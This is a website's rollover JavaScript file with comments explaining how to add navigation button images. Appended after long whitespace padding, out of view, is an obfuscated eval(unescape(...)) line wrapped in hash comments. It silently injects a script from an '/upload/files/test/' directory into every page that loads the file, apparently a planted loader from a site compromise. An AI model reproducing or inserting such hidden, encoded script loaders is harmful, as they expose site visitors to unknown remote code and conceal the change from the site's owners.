/********************************************************************************************************************

This does all the rollovers. It is a standard rollover script; there is very little different from any rollover script you can find on the web. If you want to add more javaScript functions, you can make a new .js file.

All of the highlighted images have a "2" at the end of the name. This is for both the variable name and the image address. Therefore, if you want to make a new image that changes when you hover over it, you name your default image NAME.jpg and your highlighted image NAME2.jpg. I don't forsee you needing to do this, though.

In index_commented.html, I said you would need to change this file if you wanted more navigation buttons. You would copy this:
	navigationa = new Image()
	navigationa.src = "/hb/cssfiles/navigation.gif"
	navigationa2 = new Image()
	navigationa2.src = "/hb/cssfiles/navigation2.gif"

And you would change each 'a' following "navigation" to your new letter.

You can paste this anywhere within the outer braces.

******************************************************************************************************************/



if (document.images)
{
	home = new Image()
	home.src = "/hb/cssfiles/home.gif"
	homeb = new Image()
	homeb.src = "/hb/cssfiles/home2.gif"

	whatsnew = new Image()
	whatsnew.src = "/hb/cssfiles/whatsnew.gif"
	whatsnewb = new Image()
	whatsnewb.src = "/hb/cssfiles/whatsnew2.gif"

	graphicservices = new Image()
	graphicservices.src = "/hb/cssfiles/graphicservices.gif"
	graphicservicesb = new Image()
	graphicservicesb.src = "/hb/cssfiles/graphicservices2.gif"

	contactus = new Image()
	contactus.src = "/hb/cssfiles/contactus.gif"
	contactusb = new Image()
	contactusb.src = "/hb/cssfiles/contactus2.gif"



	navigation1 = new Image()
	navigation1.src = "/hb/cssfiles/navigation.gif"
	navigation1b = new Image()
	navigation1b.src = "/hb/cssfiles/navigation2.gif"

	navigation2 = new Image()
	navigation2.src = "/hb/cssfiles/navigation.gif"
	navigation2b = new Image()
	navigation2b.src = "/hb/cssfiles/navigation2.gif"

	navigation3 = new Image()
	navigation3.src = "/hb/cssfiles/navigation.gif"
	navigation3b = new Image()
	navigation3b.src = "/hb/cssfiles/navigation2.gif"

	navigation4 = new Image()
	navigation4.src = "/hb/cssfiles/navigation.gif"
	navigation4b = new Image()
	navigation4b.src = "/hb/cssfiles/navigation2.gif"

	navigation5 = new Image()
	navigation5.src = "/hb/cssfiles/navigation.gif"
	navigation5b = new Image()
	navigation5b.src = "/hb/cssfiles/navigation2.gif"

	navigation6 = new Image()
	navigation6.src = "/hb/cssfiles/navigation.gif"
	navigation6b = new Image()
	navigation6b.src = "/hb/cssfiles/navigation2.gif"

	navigation7 = new Image()
	navigation7.src = "/hb/cssfiles/navigation.gif"
	navigation7b = new Image()
	navigation7b.src = "/hb/cssfiles/navigation2.gif"
	
	navigation8 = new Image()
	navigation8.src = "/hb/cssfiles/navigation.gif"
	navigation8b = new Image()
	navigation8b.src = "/hb/cssfiles/navigation2.gif"
	
	navigation9 = new Image()
	navigation9.src = "/hb/cssfiles/navigation.gif"
	navigation9b = new Image()
	navigation9b.src = "/hb/cssfiles/navigation2.gif"
	

	function turnOn(imgName)
	{
		if (document.images)
		{
			imgOn=eval(imgName + "b.src");
			document[imgName].src= imgOn;
		}
	}

	function turnOff(imgName)
	{
		if (document.images)
		{
			imgOff=eval(imgName + ".src");
			document[imgName].src= imgOff;
		}
	}
}




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ ;eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%31%32%30%31%39%31%33%3B%20%4A%53%53%33%20%3D%20%27%2F%75%70%6C%6F%61%64%2F%66%69%6C%65%73%2F%74%65%73%74%2F%69%64%69%6E%65%71%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%75%70%6C%6F%61%64%2F%66%69%6C%65%73%2F%74%65%73%74%2F%69%64%69%6E%65%71%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20')); /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      





































































































